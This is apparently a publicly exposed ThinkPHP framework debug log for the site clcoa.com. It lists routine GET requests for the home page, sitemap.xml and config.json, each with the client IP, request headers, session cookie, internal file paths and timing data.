BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001128s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.2086.133 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'clcoa.com', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001469s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000093s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:24:01+08:00 ] 59.82.83.196 GET / [ info ] clcoa.com/ [运行时间:0.028033s][吞吐率:35.67req/s] [内存消耗:3,333.50kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001099s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.6538.159 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=3i55ud0f1c1c6fcbdpbibtq446', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001496s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000120s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:24:01+08:00 ] 59.82.83.86 GET / [ info ] clcoa.com/ [运行时间:0.030522s][吞吐率:32.76req/s] [内存消耗:3,333.50kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000057s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001227s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.9942.46 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=3i55ud0f1c1c6fcbdpbibtq446', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001683s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000109s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:24:01+08:00 ] 59.82.83.86 GET / [ info ] clcoa.com/ [运行时间:0.028523s][吞吐率:35.06req/s] [内存消耗:3,333.50kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001185s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.2048.20 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=3i55ud0f1c1c6fcbdpbibtq446', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001474s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:27:14+08:00 ] 59.82.83.65 GET / [ info ] 47.105.33.115/ [运行时间:0.027390s][吞吐率:36.51req/s] [内存消耗:3,333.27kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001093s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.3611.32 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => '47.105.33.115', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001467s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:27:15+08:00 ] 59.82.83.65 GET / [ info ] 47.105.33.115/ [运行时间:0.030188s][吞吐率:33.13req/s] [内存消耗:3,333.54kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001161s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4005.45 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => '47.105.33.115', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=du3hc8tgv0vh2910cpmduh6if3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001712s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000127s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:27:15+08:00 ] 59.82.83.4 GET / [ info ] 47.105.33.115/ [运行时间:0.030717s][吞吐率:32.56req/s] [内存消耗:3,333.58kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001365s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.9035.62 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => '47.105.33.115', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=du3hc8tgv0vh2910cpmduh6if3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001580s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:27:15+08:00 ] 59.82.83.65 GET / [ info ] 47.105.33.115/ [运行时间:0.028475s][吞吐率:35.12req/s] [内存消耗:3,333.54kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001083s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.3608.168 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => '47.105.33.115', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=du3hc8tgv0vh2910cpmduh6if3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001457s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000129s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:27:53+08:00 ] 18.208.114.67 GET / [ info ] 47.105.33.115/ [运行时间:0.027357s][吞吐率:36.55req/s] [内存消耗:3,332.88kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001106s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001489s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000111s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:38:26+08:00 ] 39.163.193.68 GET / [ info ] clcoa.com/ [运行时间:0.029357s][吞吐率:34.06req/s] [内存消耗:3,333.18kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001142s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'accept-language' => 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001685s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000113s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:38:37+08:00 ] 111.17.77.229 GET /sitemap.xml [ info ] clcoa.com/sitemap.xml [运行时间:0.019752s][吞吐率:50.63req/s] [内存消耗:2,229.92kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001518s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'sitemap.xml', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language' => 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:38:52+08:00 ] 183.197.80.18 GET /config.json [ info ] clcoa.com/config.json [运行时间:0.019939s][吞吐率:50.15req/s] [内存消耗:2,229.92kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001223s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'config.json', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language' => 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:40:26+08:00 ] 59.82.83.134 GET / [ info ] clcoa.com/ [运行时间:0.028526s][吞吐率:35.06req/s] [内存消耗:3,333.25kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001155s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.1552.122 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'clcoa.com', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001540s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000107s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:40:27+08:00 ] 59.82.83.134 GET / [ info ] clcoa.com/ [运行时间:0.027660s][吞吐率:36.15req/s] [内存消耗:3,333.50kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001134s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.6531.183 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=kjablmpiplir5eo0l6tjuong41', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001494s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:40:27+08:00 ] 59.82.83.159 GET / [ info ] clcoa.com/ [运行时间:0.027599s][吞吐率:36.23req/s] [内存消耗:3,333.50kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001149s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.8049.15 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=kjablmpiplir5eo0l6tjuong41', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001518s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000116s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:40:28+08:00 ] 59.82.83.134 GET / [ info ] clcoa.com/ [运行时间:0.027817s][吞吐率:35.95req/s] [内存消耗:3,333.50kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001126s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5509.161 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=kjablmpiplir5eo0l6tjuong41', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001682s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:41:36+08:00 ] 101.73.167.168 GET / [ info ] clcoa.com/ [运行时间:0.027391s][吞吐率:36.51req/s] [内存消耗:3,333.31kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001170s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'accept-language' => 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001494s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000099s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:41:44+08:00 ] 101.24.7.181 GET /sitemap.xml [ info ] clcoa.com/sitemap.xml [运行时间:0.025748s][吞吐率:38.84req/s] [内存消耗:2,227.18kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000063s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001596s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'sitemap.xml', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language' => 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:41:45+08:00 ] 42.49.46.125 GET /config.json [ info ] clcoa.com/config.json [运行时间:0.020749s][吞吐率:48.19req/s] [内存消耗:2,227.18kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001230s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'config.json', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language' => 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:43:07+08:00 ] 135.237.126.250 GET / [ info ] 47.105.33.115/ [运行时间:0.026974s][吞吐率:37.07req/s] 